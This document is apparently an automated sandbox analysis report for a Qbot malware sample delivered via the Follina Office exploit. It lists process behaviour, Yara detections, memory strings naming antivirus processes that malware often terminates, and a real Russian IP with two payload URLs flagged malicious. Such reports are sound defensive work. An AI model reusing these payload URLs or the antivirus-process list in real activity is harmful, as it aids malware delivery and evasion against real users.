Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
Source: C:\Windows\SysWOW64\msdt.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msdt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008BA065 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 24_2_008BA065
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008BDD81 GetVersionExA,GetCurrentProcessId, 24_2_008BDD81
AV process strings found (often used to terminate AV products)
Source: regsvr32.exe, 00000026.00000003.565338055.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000003.566954981.0000000004D0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000003.568783827.0000000004A7F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bdagent.exe
Source: regsvr32.exe, 00000026.00000003.565338055.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000003.566954981.0000000004D0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000003.568783827.0000000004A7F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vsserv.exe
Source: regsvr32.exe, 00000026.00000003.565338055.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000003.566954981.0000000004D0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000003.568783827.0000000004A7F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
Source: regsvr32.exe, 00000026.00000003.565338055.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000003.566954981.0000000004D0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000003.568783827.0000000004A7F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgcsrvx.exe
Source: regsvr32.exe, 00000026.00000003.565338055.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000003.566954981.0000000004D0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000003.568783827.0000000004A7F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mcshield.exe
Source: regsvr32.exe, 00000026.00000003.565338055.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000003.566954981.0000000004D0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000003.568783827.0000000004A7F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Qbot
Source: Yara match File source: 38.2.regsvr32.exe.12b0184.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.explorer.exe.8b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.regsvr32.exe.4a50184.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.explorer.exe.8b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.regsvr32.exe.47f0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.regsvr32.exe.4aa0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.regsvr32.exe.12b0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.regsvr32.exe.4a80000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.regsvr32.exe.49b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.regsvr32.exe.4a50184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.regsvr32.exe.4990000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.explorer.exe.8b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.regsvr32.exe.47c0184.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.regsvr32.exe.47c0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.regsvr32.exe.49b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.regsvr32.exe.47f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.regsvr32.exe.4aa0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.regsvr32.exe.4990000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.regsvr32.exe.4a80000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.regsvr32.exe.4810000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.explorer.exe.8b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.regsvr32.exe.4810000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000028.00000002.582335427.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.580482048.0000000004990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.580575177.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.580442594.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.580343714.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.351550985.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.797056780.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.580400049.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.582578490.00000000047F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.582736314.0000000004810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.580362082.00000000012B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected CryptOne packer
Source: Yara match File source: 00000028.00000002.582335427.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.580343714.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.580362082.00000000012B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Qbot
Source: Yara match File source: 38.2.regsvr32.exe.12b0184.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.explorer.exe.8b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.regsvr32.exe.4a50184.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.explorer.exe.8b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.regsvr32.exe.47f0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.regsvr32.exe.4aa0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.regsvr32.exe.12b0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.regsvr32.exe.4a80000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.regsvr32.exe.49b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.regsvr32.exe.4a50184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.regsvr32.exe.4990000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.explorer.exe.8b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.regsvr32.exe.47c0184.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.regsvr32.exe.47c0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.regsvr32.exe.49b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.regsvr32.exe.47f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.regsvr32.exe.4aa0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.regsvr32.exe.4990000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.regsvr32.exe.4a80000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.regsvr32.exe.4810000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.explorer.exe.8b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.regsvr32.exe.4810000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000028.00000002.582335427.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.580482048.0000000004990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.580575177.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.580442594.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.580343714.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.351550985.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.797056780.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.580400049.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.582578490.00000000047F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.582736314.0000000004810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.580362082.00000000012B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected CryptOne packer
Source: Yara match File source: 00000028.00000002.582335427.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.580343714.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.580362082.00000000012B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 640918 Sample: 68101181_048154.img Startdate: 07/06/2022 Architecture: WINDOWS Score: 84 50 Snort IDS alert for network traffic 2->50 52 Yara detected Microsoft Office Exploit Follina CVE-2022-30190 2->52 54 Yara detected CryptOne packer 2->54 56 2 other signatures 2->56 6 WINWORD.EXE 2->6         started        10 regsvr32.exe 2->10         started        13 regsvr32.exe 2->13         started        15 7 other processes 2->15 process3 dnsIp4 48 185.234.247.119, 49761, 49762, 49780 INTERKONEKT-ASPL Russian Federation 6->48 36 C:\Users\user\AppData\Local\...\123[1].RES, HTML 6->36 dropped 38 C:\Users\user\AppData\Local\...7589548.htm, HTML 6->38 dropped 40 C:\Users\user\AppData\Local\...\AEF9D296.htm, HTML 6->40 dropped 17 msdt.exe 6->17         started        20 MSOSYNC.EXE 6->20         started        22 MSOSYNC.EXE 6->22         started        58 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 10->58 60 Maps a DLL or memory area into another process 10->60 42 C:\Users\user\AppData\Local\...\mj2renji.dll, PE32 15->42 dropped 44 C:\Users\user\AppData\Local\...\ej5ypzxn.dll, PE32 15->44 dropped 46 C:\Users\user\AppData\Local\...\343kkfih.dll, PE32 15->46 dropped 24 powershell.exe 36 15->24         started        26 conhost.exe 15->26         started        28 cvtres.exe 15->28         started        30 2 other processes 15->30 file5 signatures6 process7 file8 32 C:\Windows\Temp\...\DiagPackage.dll.mui, PE32 17->32 dropped 34 C:\Windows\Temp\...\DiagPackage.dll, PE32+ 17->34 dropped
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.234.247.119
 unknown Russian Federation
198004 INTERKONEKT-ASPL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.234.247.119/1240405476.dat true
  • Avira URL Cloud: safe
 unknown
http://185.234.247.119/123.RES true
  • Avira URL Cloud: safe
 unknown